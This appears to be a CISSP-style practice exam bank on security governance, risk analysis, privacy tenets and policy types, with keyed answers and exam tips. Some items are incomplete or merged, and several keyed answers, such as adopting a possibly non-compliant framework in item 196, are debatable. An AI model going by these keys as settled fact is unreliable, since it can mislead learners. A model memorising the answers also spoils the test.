Regulatory mandates may have stronger consequences
Contractual mandates have stronger incentives
Regulatory mandates do not have financial incentives
Contractual mandates are derived from regulatory mandates
Regulatory mandates do not have financial incentives
This is a convoluted way of saying that contractual mandates do have financial incentives.
109
Which of the following would most likely not be considered intellectual property?

A work that is not registered with a copyright organization
A work that is published to the web and available for the public to see
A work that is in the public domain without the knowledge of the original author
A work that is given by the author into the public domain
A work that is given by the author into the public domain
Public domain works, as long as they are given as such by the creator, are not considered intellectual property and do not need to be protected.
110
If twelve yachts are worth 60 million total and the damage per boat from a hurricane is $20,000, and hurricanes occur once every three years, what does the value 0.33 represent?

Rate of expected loss
Rate of loss expectancy
Rate of asset valuation
Rate of annualized occurrence
Rate of annualized occurrence
This question is looking to see if you know the difference between AV, EF, ALE, ARO, and SLE. While this is not worded exactly correctly, ARO is the correct answer even though it rearranges the words to throw you off.
111
Which of the following would not be a component of an acceptable use policy?

Password requirements for the company’s systems
Disclosure requirements for employees who handle sensitive data
Email and internet use guidelines for onsite vendors
The company’s system usage guidelines for applications that process public data
Password requirements for the company’s systems
Password requirements for systems are typically part of requirements identified during the SDLC. All other options would be included in the policy even though they are worded slightly differently than your book may have presented them.
112
Which of the following could be an issue with the business impact analysis?

The asset values contained therein might be nominal values to one particular area
User error issues
The analysis is ongoing and never viewed as complete by the business owners
The BIA has many vulnerabilities that could be exploited by an administrative process
The asset values contained therein might be nominal values to one particular area
This question may be especially challenging since it does not have enough information to make a good choice with the available options (the question is vague or ambiguous). The best approach with questions like this is to either think through the process to what the eventual outcome or missing component might be, or to give the available options a rating to see which one is CLOSEST to being the right answer.
Knowledge needed: Ideally the BIA will contain mostly accurate asset values rather than nominal values that one particular area of the business presumes.
113
Privacy Law Tenets
1. Participation – the data subject should have the option to opt in or opt out.
2. Limitation – data can only be used for the purpose stated.
3. Scope – there must be a specific purpose (and it must be legal/ethical); the scope should be included in the notification.
4. Accuracy – the data must be as accurate as possible, and the data subject should be able to make corrections.
5. Retention – the data should be kept only as long as it’s needed.
6. Security – the custodian must protect the data.
7. Dissemination – the custodian must not share the data without notifying the data subject.
8. Notification – must notify the user that you’re collecting and creating their data before it’s used; should include purpose of use.
114
Non-Disclosure Agreements prevent employees from divulging sensitive information
Procedures ensure that tasks are performed according to standards
Education about security is the best way to change employee behavior
Policy sets the foundation for the organizational culture
Procedures ensure that tasks are performed according to standards
Knowledge needed: Candidates need to be aware of the difference between policies, standards, procedures, and guidelines.
Policy – should have the following components:
- High level overview of security strategy or goals
- Contains data classifications (confidential, sensitive, etc.)
- Type of access management (whether role-based, etc.)
- Expected user behavior with the entity’s IT systems and data
- High level personnel security practices, such as background checks
Standard – should have the following elements:
- Can come from statutory/administrative law, professional organizations, or industry groups
- Describes settings, expectations of performance, configurations, specific requirements
Guidelines – contain recommendations and suggestions, but they are not required.
Procedures – contain specific, repeatable steps; very task-oriented.
115
The disallowance of unfair trade practices might be an example of:

Code of ethics
Policy
Standard
Procedure
Code of ethics
While this is a specific directive, you have to think about where it would fit within the given options (don’t assume too much) – in this case an organizational code of ethics would be the best fit.
116
Marco works for the University of Law whose CIO requests information on how much damage would be done to the campus if an earthquake occurred. What metric should Marco present to the CIO as input for the risk assessment?

Exposure factor from an earthquake
Annualized cost of mitigation of an earthquake
Single loss expectancy from an earthquake
Annual loss expectancy from earthquakes in the area
Exposure factor from an earthquake
ALE is the amount of loss the company currently experiences, single loss expectancy is the loss from a single instance, and annualized cost of mitigation is not a concept in the CBK.
117
Who is ultimately responsible for security?

Policy as written by upper and executive management
Executives who are not directly interacting with staff carrying out the program
Employees who have delegated authority from executives
Everyone in the organization, at the direction of executives
Executives who are not directly interacting with staff carrying out the program
While many organizations state that all employees are responsible, such a directive can only come from executive management.
118
If a mannequin is placed at the front desk to look like a security guard and the facility also has dim lighting, a fenced perimeter, and an alarm system, which of the following statements is most true?

The mannequin is a preventive control.
The fence is a compensating control.
The mannequin represents a mitigation.
The mannequin is a vulnerability.
The fence is a compensating control.
Since the lack of a guard is a vulnerability, the other controls are compensating.
119
Barney is the front desk security guard and has called in sick for his night shift. He is the only guard willing to work the night shift since the other guards have small children and family duties. Due to separation of duties, your CIO won’t let you fill in for Barney, but instructs you to take one of the mannequins from storage and dress it up in security guard clothing and prop it at the guard desk for the night. Due to the dim lighting inside, a fenced perimeter, and an alarm system, the CIO felt okay with giving you this directive. Which of the following statements is most true?

The mannequin represents a mitigation
The fence is a compensating control
The mannequin is a deterrent control
The mannequin is a vulnerability
The mannequin is a deterrent control
This question tries to confuse you with too much information in the beginning. Since the lack of a guard is a vulnerability, the mannequin would deter an attacker from breaking in.
120
What is the best description of governance?

The process of how an organization is managed
The security of an organization within a company
The management of various processes and procedures
The process of managing security policies to influence behavior
The process of how an organization is managed
121
Your CIO instructs you to perform a risk analysis on an issue that the company’s failover site is currently experiencing. Employees at the site often disagree with information security principles and the CIO’s vision, due to lack of education and training. There is limited-to-no information on asset values due to the failover site losing its accounting records in a fire last year, and the company’s data mostly consisting of intellectual property that hasn’t been released yet. What is the best approach to this situation?

Take a subjective approach to risk analysis
Take a hypothetical approach to risk analysis
Take a hybrid approach to risk analysis, combining quantitative and qualitative methods
Take an objective approach to risk analysis
Take a subjective approach to risk analysis
“Subjective” means that something is based on opinions or feelings, and is the description of “qualitative”. This is the best approach due to the lack of numeric values and un-quantifiable metrics.
122
Astrotek Company has just experienced an unexpected outage of both the primary site and the mirror site. The duration of this outage has been declared to be at least three weeks. As you begin to examine the contingency plan, what is the first category of items you should look for?

Recovery steps to the hot site within the given recovery time objective
Reconstitution steps to the cold site within the recovery point objective
Reconstitution steps to the warm site that exceed the maximum allowable downtime
Recovery steps to the alternate site within the recovery time objective
Recovery steps to the alternate site within the recovery time objective
Alternate site (could be warm or cold) within the RTO is the best choice here, given that we don’t have more details. The other options mix terminology to confuse you. A hot site is the same as a mirror site.
123
What is the best recommendation for a risk assessment wherein 12 yachts are valued at 5 million each, hurricanes cause $20,000 worth of damage per boat, and typically occur once every three years?

The annualized rate of occurrence drops to 0.32%
Purchase insurance if the annualized loss expectancy for each boat exceeds the cost of the annualized rate of insurance.
The total cost of insurance for each boat is $100,000.
Purchase insurance if the single loss expectancy for each boat exceeds the cost of the annualized rate of insurance.
Purchase insurance if the annualized loss expectancy for each boat exceeds the cost of the annualized rate of insurance.
Remember that the ALE is what’s currently being experienced, thus the cost to transfer the risk (insurance) must be less than the ALE.
124
A site license means:

All staff at one location can use the software, regardless of the number
All staff for one business can use the software, regardless of the number
All staff at one location can use the software, regardless of the number of companies
All individuals can use the software at a specific location, as long as they agree to the terms
All staff at one location can use the software, regardless of the number
125
Which of the following is a list of assets that also shows criticality?

Business impact analysis
Asset classification inventory
Privacy impact analysis
Software inventory
Business impact analysis
126
Which of the following would be an efficient method of evaluating the effectiveness of a Security, Education, Training and Awareness (SETA) program?

A logging mechanism that shows which employee took the training with date and time stamp, and average outcomes.
Gamification that includes difficult quizzes for employees to complete within the training modules.
Games, quizzes, and prizes included with the module to make the SETA activities fun and engaging.
Embedded security games within the training that feed user scores into a separate data analytics system.
Embedded security games within the training that feed user scores into a separate data analytics system.
One of the key words in this question is “evaluating”. Hold on to that word as you read through the options to determine which of the options is the best option. While the question itself doesn’t ask you to find the “best option”, you should assume that’s the case with all questions. Gamification, while fun and engaging, is useless in evaluating the training’s effectiveness unless scores can be viewed and evaluated by management.
127
Which of the following is not an example of governance?

Regulations dictating who can make decisions
A formalized decision making policy that involves board members
The business owner arbitrarily made the decision not to purchase and install a layer 3 switch
The security officer conducting in-person training to board members
The security officer conducting in-person training to board members
This is almost a giveaway question, but could be challenging since it presents real-world scenarios. If you understand what governance is, the key word “decision” should stand out in all the options here. Also, note how the question uses the phrase “is not”, in which case you should, by now, be able to flip the wording in your mind by saying “all of these are examples EXCEPT…” and hopefully arrive at the right answer.
128
What could be a problem with the Traditional/Loss Expectancy risk assessment model taught in the Common Body of Knowledge?

It is more of a corrective approach rather than preventive
Unrealistic vulnerability identifications, standard compensating controls that prevent future loss expectancy capabilities, and more emphasis on application security
It is more of a qualitative approach rather than quantitative
Unrealistic single loss expectancies, standard quick remediations that prevent future occurrences, and it may be more suitable to physical security
Unrealistic vulnerability identifications, standard compensating controls that prevent future loss expectancy capabilities, and more emphasis on application security
This is part of the CBK that is hidden within the pages of the risk management module. Pay special attention to these sections as they often have important information for the exam.
129
Before any penetration test activities are performed, what must be considered?

Management approval
Potential impact to organizational assets
Potential impact to asset values
Management oversight
Potential impact to organizational assets
Ambiguous questions can be difficult. Two key words are “performed” and “considered” – management decisions have already been made if you are “performing” pentest activities. Make sure you understand the question completely before choosing an answer.
130
Security is most likely considered which of the following?

An operations function
A compliance function
A support function
A governance function
A support function
Remember that the purpose of security is to support the organizational mission/goals.
131
What is the entirety of policies, roles, and processes that an organization uses to make security decisions?

Governance
Incident management
Organizational culture
Security governance
Security governance
Key phrase in the question: "security decisions".
132
Which of the following is an aspect of governance?

The process of how a decision is made
The process of how employees behave
The incident response process
The divestiture process
The process of how a decision is made
133
Which of the following might not apply to third-party assessors?

Employment agreements
Service level agreements
Organizational policies
Non-disclosure agreements
Employment agreements
Since the third party is not an employee, an employment agreement would not apply to this situation.
134
Your organization is evaluating whether to adopt a three-step photoelectric cell analysis process for more accurate smoke detection, or a one-step process for quicker detection. What risk perspective is being utilized?

Asset-based
Process-based
Vulnerability-based
Outcomes-based
Process-based
Knowledge needed: Safety critical activities can frequently be the focus of process-based risk perspectives. As the title suggests, processes are the primary focus of process-based risk analysis.
135
Which of the following is not a security control framework?

ISO 27002
COBIT
GDPR
NIST RMF
GDPR
136
Who most likely makes the final decision on what a company’s potential asset values might be?

Functional management
Senior management
Accounting staff
Line supervisors
Senior management
Line supervisors are typically concerned with day-to-day supervision tasks, whereas functional management has a better perspective on what the asset values might be. Senior and executive management would make the final decision while taking into consideration the input of functional management.
137
A control that imposes a mandate is also known as:

Detective
Dispensive
Deterrent
Directive
Directive
138
Which of the following is not a physical vulnerability?

First floor data center with a planned floor raising project
Humidified areas in a data center
Flammable materials near a fire extinguisher
Automatically opening doors that never lock near a guard kiosk
Humidified areas in a data center
Again, when questions contain “not”, be sure to re-write them in your mind to something like “These are all physical vulnerabilities EXCEPT…”, at which point the question should become easier.
139
Looking at the results of a recent vendor audit prior to purchasing products or services might be an example of:

Due diligence
Due care
Comprehensive staff work
Work factor
Due diligence
Remember that due diligence is doing the pre-decision work, or the research; whereas due care is the action, or the decision piece. In the context of this question, purchasing the services of the best and most compliant vendor would be practicing due care.
140
Which of the following best represents the principle of data minimization?

An online tax portal that collects user name, address, social security number, and hair color.
An online trading platform that collects user bank account and bank transaction histories along with name, address, and social security number.
A tele-health mobile phone application that collects credit card, billing, name, and criminal history information.
An e-commerce web application that collects individuals' names, shipping/billing address, and credit card information.
An e-commerce web application that collects individuals' names, shipping/billing address, and credit card information.
The data minimization principle of GDPR stipulates that data collected must be limited to the minimum amount of data necessary for the specified purpose.
141
In which of the following scenarios has the organization implemented “enough” of its security standards?
No encryption of data in transit; with a corrective action plan that is analyzed quarterly
Lack of data classification program; with perimeter firewalls and IPSec
Lack of encryption for data at rest; with an organizational viewpoint that more can always be done
Monthly security control reviews and quarterly vulnerability scans, but no official security program
Lack of encryption for data at rest; with an organizational viewpoint that more can always be done
This question combines the concepts of professional ethics and risk maturity from Domain 1 in a vague fashion. Continuous improvement is a philosophy in the ISO 27000 family of standards. It claims that “enough” implementation does not really exist, thus the assumption is that no matter what you do, you can always do more. Security management is a process, not a goal or task with a definable end date.
142
If your company pulls copied flat-files from a credit reporting agency in order to conduct administrative investigations, what type of non-disclosure agreement (NDA) is in place?
Multilateral NDA
Bilateral NDA
Unilateral NDA
Non-compete agreement (NCA)
Unilateral NDA
Unilateral refers to a one-way disclosure agreement.
143
What is the tradeoff with implementing any given security control?
It requires time and resources
It may have a negative impact on operations
It requires change management
It may have a negative impact on asset value
It may have a negative impact on operations
144
Which of the following would provide the best number of samples and data points for a risk assessment prior to building and deploying a mobile device management system?
Systems audit
Security assessment
Certification
Simulation
Simulation
Simulation provides numbers, samples, and data points as a basis of risk before systems are built. If you struggled with this question, be sure to read up on simulation in Domain 1.
145
Elevation of privilege in the STRIDE model refers to which of the following?
Attaining a level of control with the capability to destroy target data and systems.
Obtaining authorized-user credentials on the target system to carry out attacks.
The destruction of users with elevated privileges within a target system.
Elevating permissions of authorized users in the system.
Attaining a level of control with the capability to destroy target data and systems.
Vague options can be confusing. Rule out any options that contain information that is too specific, such as destruction of users, or allowing unauthorized users into the system. Elevating permissions may be tempting, but the key phrase in that option is too specific (allowing users into the system). While this could be part of the threat model, the STRIDE model is described at a higher level in the Common Body of Knowledge.
146
Which of the following is most likely not a software vulnerability?
An aspect of the code that does not create an exploitable vulnerability
Unintentional defect in programming
Intentional defect in programming
An aspect of the code that creates an exploitable vulnerability
An aspect of the code that does not create an exploitable vulnerability
Double negatives can be tricky. Rephrase the question in your mind to “All of these are software vulnerabilities” and then find the one that isn’t. If there’s another negative in the answer/response, rephrase the response, in this case to read “An aspect of the code that prevented vulnerabilities”.
147
What is the best way to prevent risk assessments from using poorly constructed averages that mix qualitative and quantitative measures erroneously?
Using risk simulations
Factor analysis of information risk (FAIR) method
Assigning probability of occurrence values to each risk
Using the NIST Risk Management Framework
Factor analysis of information risk (FAIR) method
The FAIR method uses straightforward, numeric, and simple ways to make most risk assessment tasks start out quantitative and stay that way.
148
As the new information security analyst for an e-commerce company specializing in diaper sales, what risk perspective should you have if the company considers daily sales of diapers to be its primary asset?
Vulnerability-based
Asset-based
Threat-based
Outcomes-based
Outcomes-based
An outcomes-based risk approach identifies goals or objectives the company wants to achieve and links them to the core business processes that make them happen.
149
What is the best course of action if you discover that lack of sufficient humidity controls is causing a risk of condensation in the server room?
Request that senior management decide on whether to transfer, mitigate, accept, or avoid the risk due to its severity.
Alert senior management so that a priority can be set on the risk, and request that a decision be made to mitigate, transfer, accept, or avoid the risk.
Present the risk to senior management under the context of human safety and request that one of the four risk decisions be made.
Schedule a meeting with senior management to discuss the risk, and request that a decision be made to either mitigate or avoid the risk.
Alert senior management so that a priority can be set on the risk, and request that a decision be made to mitigate, transfer, accept, or avoid the risk.
Domain 1 of the revised Common Body of Knowledge (May 2021) brings a new update to the decision-making process for risk. Each risk must have two decisions made before anything should be done to respond: 1) prioritize; 2) choose one of the four decisions: mitigate, accept, transfer, avoid. Since the condensation is a risk and not an imminent threat (i.e. it’s not happening right now), the two decisions must be made before acting on it.
150
Which of the following is intended to manage and document security functions for an organization?
ITIL
COBIT
ISO 31000
ISO 27001
COBIT
151
A control that is implemented through policy or procedure is:
Management
Directive
Deterrent
Administrative
Administrative
152
Controls that recognize activities can be referred to as which of the following?
Detective controls
Corrective controls
Directive controls
Recovery controls
Detective controls
Detective controls identify or recognize malicious activity.
153
Which of the following is most likely not considered a recovery control?
Restoring a desktop computer after a malware infection
The decision to conduct backups
Adherence to a backup standard
Adherence to the disaster recovery plan
The decision to conduct backups
A decision to conduct backups would most likely be considered part of the governance process and not a recovery control. The others are administrative, technical, preventative, and corrective controls (controls may fall into more than one category).
154
Other threat models outside of STRIDE may include which of the following?
Strike, FIPS
Streak, OTTO-OCTAVIUS
TWEAK, OCTAVE-S
OCTAVE, Trike
OCTAVE, Trike
155
The difference between regulatory standards and legal standards is:
Legal standards are based on court decisions; regulatory standards are mandates set by government agencies
Regulatory standards are enacted by the public; legal standards are based on jury outcomes
Regulatory standards are based on international laws; legal standards are based on local laws
Legal standards represent the views of government agencies; regulatory standards represent the views of court decisions
Legal standards are based on court decisions; regulatory standards are mandates set by government agencies
Comparison questions can be the trickiest. Be sure to focus on the question and what you know.
156
The difference between an employee handbook and an employee contract is which of the following?
The handbook informs employees about expectations; the contract holds employees accountable for disclosure issues
The handbook informs contractors about expectations; the contract holds them accountable for behavior requirements
The contract informs employees about expectations; the handbook holds employees accountable
The handbook informs employees about expectations; the contract holds them accountable for behavior requirements
The handbook informs employees about expectations; the contract holds them accountable for behavior requirements
157
Your CIO wants to protect media using a technical control. Which of the following would be the best recommendation?
Electronic use policy/procedure
Electronic locks
Encryption
Technical logging implementation procedures
Encryption
158
Pretending to be an authorized user occurs in which element of the STRIDE model?
Elevation of privilege
Spamming
Spoofing
Masquerading
Spoofing
159
Noncompliance with PCI-DSS could result in:
Issues with the supply chain
A reduction in revenue
Regulatory shutdown
Audit findings
A reduction in revenue Regulatory shutdown
PCI DSS noncompliance results in loss of the ability to process card payments, resulting in loss of sales or revenue.
161
Which of the following might be considered a support function?
Cryptographic services applied to informational assets by the security office staff who were intentionally left out of the recovery plan documentation
The facilities group that ensures the stability of critical day-to-day activities
Network administration of a large IT services company who were mistakenly left out of the recovery plan documentation
Revenue generating operations, such as sales, and the employees designated as critical path
Cryptographic services applied to informational assets by the security office staff who were intentionally left out of the recovery plan documentation
Information security is a supporting function. One of the key words here is “critical”. Security staff may or may not be designated as critical path; however, such terminology can be thrown in just to confuse you.
162
Indicating to someone that their data will be collected for a specific purpose, but not indicating how it will further be used might be an indication of:
The Participation tenet but not the Retention tenet
The Scope tenet but lacking the Limitation tenet
The Scope tenet but not the Privacy tenet
The Notification tenet but lacking the Scope tenet
The Scope tenet but lacking the Limitation tenet
163
The difference between risk management and risk mitigation is most likely which of the following?
Managerial opinion versus staff opinion
Addressing many issues versus addressing a single issue
Policy versus procedure
Avoiding issues versus acceptable issues
Addressing many issues versus addressing a single issue
Take your time with questions like these. When there is vague wording, look at the overall spirit of the question and pick “the best of the worst”, since all of these options are poorly worded.
164
Notifying an individual that the data will only be used for the scope in which it was collected might refer to which of the following?
Participation tenet
Notification tenet
Scope tenet
Limitation tenet
Limitation tenet
165
Your CIO asks you to review a risk report that details the former cost of a soon-to-be deprecated data center. The report indicates that despite the legacy system, the organization cannot decommission the data center or update its systems without incurring major cost. What type of report is this, and what should be done?
Quantitative risk analysis; consideration of mitigating controls presented in the risk report
Qualitative risk analysis; consideration of mitigating controls presented in the risk report
Qualitative risk analysis; consideration of compensating controls presented in the risk report
Quantitative risk analysis; consideration of compensating controls presented in the risk report
Quantitative risk analysis; consideration of compensating controls presented in the risk report
166
Informing the data subject that their information is about to be collected and used for something might refer to which of the following?
Limitation tenet
Scope tenet
Participation tenet
Notification tenet
Notification tenet
167
You receive an email that states the following: “We are required to protect any information transmitted between network segments, devices, and endpoints.” The requirement most likely refers to which of the following?
Security Policy
Security Framework
Security Standard
Security baseline
Security Policy
168
You receive an email that states the following: “We are required to protect all attachments using Advanced Encryption Standard. The best way to achieve this is through the use of the ZiparChives software licensing that we already have via bulk purchase.” This email is most likely an example of:
Security Policy
Security Framework
Security Guideline
Security Guideline
169
Notifying the data subject that they can disallow the data custodian from interacting with any data collected refers to which of the following?
Participation tenet
Limitation tenet
Scope tenet
Notification tenet
Participation tenet
171
Restricting traffic disclosure in a star topology by utilizing smart port management might be an example of:
A guideline
A policy
A procedure
A standard
A standard
172
A security pamphlet that is normally given to the public outlining an organization’s security practices might be derived from which of the following?
Guidelines
Procedure
Standards
Policy
Standards
This is straight from the CBK. “Practices” typically represent what is currently being done, thus standards would be the best choice. Policy influences standards, which drive procedures, and guidelines are good ideas.
173
Your organization is using a deprecated cryptographic protocol internally within the network, but has disabled the ability of anyone to use, install, or connect decryption technologies while preventing external connections. The deprecated protocol represents:
A safeguard
A threat
A vulnerability
A risk
A vulnerability
174
If a server team is responsible for web applications and their data, why might the server team take into consideration contacting the security practitioner in the event of a mirrored disk failure?
Because policy might require it
Because regional regulations might require it
Because guidelines might suggest it
Because procedures might require it
Because guidelines might suggest it
This question requires you to pay attention to the wording (as do all questions). It tests your knowledge of the difference between policy, procedures, guidelines, and regulation. The phrase “take into consideration” is the giveaway: guidelines are suggestions and not required. All other options would be some type of requirement.
175
An internal process document that contains an overview of your organization’s incident response process has the following: triage, intake, declaration, investigation, operational-state, root-cause analysis, root-cause resolution, lessons-learned meeting. This document is most likely which of the following?
Standard
Guideline
Procedure
Policy
Standard
The document is a standard because it represents an overview of a process rather than specific steps.
176
As an employer requiring a high degree of trust in your employees, what is the most effective method of achieving this level of trust?
Background check, employment check, and financial profile check
Implementing strict personnel security policies within the organization
Writing precise expectations within an employee handbook that must be adhered to
Codifying the performance expectations through an employment contract
Codifying the performance expectations through an employment contract
Since contracts are legally enforceable, this is the best option.
177
Three documents have been delivered to you that contain the following: a document that describes the security strategy of your organization; a document that requires that background checks be conducted by the Department of Justice; and a document that states employees should use heat-proof gloves when removing food from the ovens. These documents represent which of the following?
Policy, standard, guideline
Requirement, guideline, standard
Strategy, standard, procedure
Policy, procedure, governance
Policy, standard, guideline
178
What is the difference between risk acceptance and risk avoidance?
Both are documented within policies; one addresses management approach and the other addresses the decision making process
Both are policies; one addresses baseline configuration and the other addresses management approach
Both are decisions; one addresses attitudes on risk and the other addresses performing the assessment
Both are decisions; one addresses consequences and the other addresses preventing the consequences
Both are decisions; one addresses consequences and the other addresses preventing the consequences
179
If a server team is responsible for web applications and their data, why might the security practitioner be contacted in the event of a mirrored disk failure?
Because it could impact integrity and could be related to a security incident
Because it might not impact confidentiality but might impact integrity
Because it could impact availability and could be related to a security incident
Because it is related to availability and might impact integrity
Because it could impact availability and could be related to a security incident
This question tests your knowledge of the difference between the CIA tenets of information security from Domain 1.
180
Before beginning your new position, the Human Resources department paid for access to a database containing portions of your credit report and criminal history without your knowledge. What best describes this scenario?
A procedural action
A preventive control
A privacy issue
An administrative control
An administrative control
The key concept is that the organization did something before hiring you, which is an administrative control no matter how you might feel about it or what the laws might be in your area. It would not be considered a procedure because the question does not mention any referencing of a document.
181
What is the difference between training/awareness review and training/awareness evaluation?
Review is formal, evaluation is informal
Review examines content, evaluation examines context
Review examines outputs, evaluation looks at inputs
Review looks at inputs, evaluation looks at outputs
Review looks at inputs, evaluation looks at outputs
This question tries to confuse you with vague wordings. Inputs for training/awareness might be a vague way of indicating the content and what’s driving the content, whereas output refers to the efficacy of the program. Evaluation is the formal process.
182
Your organization manages a public-facing web application that uses two application servers, two database servers, and a transport layer security (TLS) accelerator that is required by the data classification for user sessions. What is the vulnerability and relative mitigation for this scenario?
If the TLS accelerator fails, then traffic may be unencrypted; consider implementing a redundant accelerator
If either of the web application servers fail, availability will be impacted; implement redundant web servers to handle failures
If the database servers fail, integrity will be impacted; implement a redundant array of independent disks (RAID)
If one web server and one database server fail but the TLS accelerator remains active, only availability will be impacted; implement a RAID solution for the database
If the TLS accelerator fails, then traffic may be unencrypted; consider implementing a redundant accelerator
This question tests your ability to filter out key terms that are used incorrectly, to identify the vulnerability, and to pay attention to wording. The reference to “availability” might have been the most tempting, but pay special attention to the word “either”, which means that if one OR the other fails (not both, in which case redundant web servers would be the correct answer).
183
Recently one of your employees was tricked into downloading ransomware by visiting a compromised legitimate website. What would have been the best preventive measure in this scenario?
Netshare and local file backups
Security awareness training that covers social engineering
Patched systems, content filtering, and up-to-date intrusion prevention systems
Security awareness training that covers phishing
Security awareness training that covers social engineering
The key word here is “tricked,” which means that social engineering has occurred, and the best preventive measure would be appropriate security awareness training. Phishing is a type of social engineering, and since we don’t know the method of trickery, security awareness training that covers social engineering is the best response.
184
A document that states fences must be at least ten feet tall and preferably twelve feet tall might be considered which of the following?
A policy or a guideline
A standard or a guideline
A hybrid standard/guideline
Physical security preferences
A hybrid standard/guideline
185
The difference between continuity and contingency is most likely which of the following?
Continuity comes before contingency
Contingency recovers, continuity restores
Continuity comes after contingency
Contingency is critical, continuity is normal
Contingency is critical, continuity is normal
The key word is “critical”. Contingency is concerned with critical operations. While poorly worded, you may see questions like this in the exam that seek to confuse you (aka: test your knowledge).
186
What is the best example of security governance?
A group of employees comprised of staff and management who meet regularly to discuss how to better respond to and manage security incidents from a governance perspective
Executive management that oversees various processes and procedures used within the organization to govern its business activities
Security managers and officers of an organization within a company who carry out the governance directives
A group of mid-to-high ranking employees who meet regularly to discuss security policies, roles, and processes used to make security decisions
A group of mid-to-high ranking employees who meet regularly to discuss security policies, roles, and processes used to make security decisions
The term “governance” is used in the available responses to tempt you into selecting the wrong answer. Notice that one group is focused on security incidents, another is concerned with overall processes/procedures, and another is concerned with carrying out the governance directives. These can all be ruled out.
187
You have been asked to look at the policies mentioned in the Security, Education, Training & Awareness (SETA) module to see if anything needs updating. This might be an example of:
Audit of the training program
Program effectiveness evaluation
Evaluation of the awareness program
Assessment of the education program
Program effectiveness evaluation
This is the updated terminology used for a security education, training & awareness program in Domain 1.
188
Several legitimate company users have complained that logging into your web application takes five to ten minutes, while an analyst reports to you that pulsing zombies are occasionally flooding the application with packets from compromised systems. In elevating this event, how should it be classified for upper management?
Degradation of service attack
Distributed denial of service attack
Zombie botnet
Pulsing zombie attack
Degradation of service attack
This could be a type of beta question that uses terminology not necessarily covered in the CBK. The key word in this question (not that they all have key words) is “occasionally”, which indicates that the attack is not continuous; in combination with the fact that login is taking five to ten minutes (as opposed to never), this indicates a degradation, not a denial.
189
After being alerted that an employee has stolen sensitive equipment and data for personal use, you examine their personnel file and discover that a background check was conducted but reference checks were not. This could indicate which of the following?
Poor personnel screening practices
Policy violation
Poor judgment
Poor personnel hiring practices
Poor personnel screening practices
This question is vague but seeks to test your knowledge about what category background checks and reference checks fit into. When an option is as vague as “poor judgment”, you can instantly rule it out. Also, while high-level options (such as hiring practices) might seem good, the exam is testing you on specific concepts presented in the CBK.
190
When a company manages its operations and policies using the Sigma model, this is indicative of which principle?
Governance
Policy
Configuration management
Change management
Governance
191
Which of the following is not a technical control?
Staff using write-block technology to conduct forensics on suspicious devices
A log that is created to assist in the detection of inappropriate activity showing username, access time, data accessed
An alert that is sent when a user tries to access a data element without the proper permissions
A configuration setting that reports device locations to the central authentication server
Staff using write-block technology to conduct forensics on suspicious devices
Investigative processes are detective controls, which can sometimes be technical as well, but not in this case.
192
A security manager is unable to conduct an investigation despite having the knowledge/expertise and not having procedures. What is the most probable cause for the inability to conduct an investigation?
Investigative standards most likely do not exist to guide the security manager
An investigative policy most likely does not exist that provides guidance
Investigative guidelines have most likely not been developed or approved by upper management
A procedure does not exist to indicate the steps the security manager must take
Investigative standards most likely do not exist to guide the security manager
Since the procedures do not exist and the manager already has the appropriate knowledge, focus on what may be missing from this equation and look back to your lesson on the difference between policy, standard, guideline and procedure. In questions like this, not everything will be spelled out perfectly for you, and you may need to make some assumptions using the knowledge you gained from studying the CBK. As always, go with the best of the worst options.
193
What should be considered in addition to dynamic policy control in order to help protect highly sensitive data?
Licensing and centralized access control
Centralized access control and interoperability
Licensing and continuous audit trails
Decentralized access control and persistency
Licensing and continuous audit trails
Ultimately this question tests your knowledge about digital rights management solutions. Since very little information is given, you have to look for key words and make assumptions (e.g. dynamic policy control).
194
What is the most important component of the contingency plan?
Remediation steps to the alternate site
Response steps to the primary site
Recovery steps and objectives to the alternate site
Reconstitution steps and objectives to the primary site
Recovery steps and objectives to the alternate site
While short and vague, this question tests your knowledge of terminology from the Security Operations and Security Risk Management domains; the many “Rs” (remediation, response, recovery, etc.) can be confusing when not presented in the context of their respective domains. Be sure to study up on contingency planning and incident management if you missed this question.
195
Your company’s management philosophy, including its risk appetite, might be found where?
In its governance
In its personnel handbook
In its policy
In its standards
In its governance
Vague wording is used in this question. Governance is the best answer because it takes into consideration all the policies, standards, and handbooks from the company.
196
You receive word from the governance committee that a weaker security framework must be adopted immediately to save costs, but you are approached by an analyst who tells you that adopting the weaker framework could bring the entity out of compliance with federal law. Shortly thereafter, the analyst is laid off. What should you do in this scenario?
Implement the weaker framework
Gather evidence in support of the new framework
Ask the laid off analyst for supporting documents
Notify the regulating federal agency
Implement the weaker framework
In difficult ethical questions like this, pay attention to wording. One key word is “could”, meaning it’s unknown whether the company would be out of compliance. Also, keep in mind that nothing in this question ties the two incidents together (weak framework and being laid off). In addition, remember that security is a supporting function that must align with organizational goals.
197
If key data inputs and metrics are missing, what is the best approach to conducting a risk analysis?
Subjective
Objective
Hybrid approach that combines quantitative and qualitative
Quantifiable method
Subjective
“Subjective” is the same as qualitative. Since metrics are missing, this is the best option.
198
Recently a court ruled that forensic investigations in your district can no longer use write-block technology. This is most likely which of the following?
Legal standard
Legal ruling
Regulatory standard
Industry standard
Legal standard
This question tests your knowledge of the difference between legal, regulatory, and industry standards. The key phrase here is “court ruled”.
199
Management is concerned that infections in the workplace may rise if temperatures are not taken before employees enter the building. This concern can best be defined as which of the following?
Vulnerability
Exposure
Risk aversion
Likelihood
Likelihood
This is a vague question, but remember that likelihood is the measure of possibility. If the possibility is increasing, the likelihood is increasing.
200
A protocol document approved by senior management that appears to be outdated conflicts with the runbook approved by your management team. What should be done in this situation?
The protocol document should be followed.
A guideline should be developed.
The runbook should be reviewed.
The runbook should be followed.
The protocol document should be followed.
Given that one of the options talks about “guidelines”, you might be able to decipher that this question is talking about the difference between policy, procedures, standards, etc. Also, given that none of these answers are perfect, you have to choose the best one, which is usually the higher level option, since a protocol (policy/standard) would overrule a runbook (procedure). Thesaurus and non-CBK terms are commonly inserted into questions to test your ability to apply the knowledge and your ability to wade through challenges.
201
You are covertly ordered by two out of twelve board members to initiate an internal investigation on your manager. What is the best approach in this situation?
Explain the concept of separation of duties and ask for guidance.
Gently recuse yourself explaining your chain of command.
Conduct the investigation discreetly without anyone’s knowledge.
Educate the board members on how to submit a complaint to internal affairs.
Educate the board members on how to submit a complaint to internal affairs.
In ethical dilemma questions, pay attention to the wording and, when in doubt, the best approach is to look for established processes/procedures that can be followed. Also try to ignore irrelevant information within the question, such as the number of board members and their lack of knowledge. Since each of the available options has an inherent assumption (which will make you uncomfortable during the exam), you have to choose the BEST one.
202
Which of the following is an adequate clause for a service-level agreement?
Service must comply with security regulations outlined in the contract. Any variances will result in financial penalties.
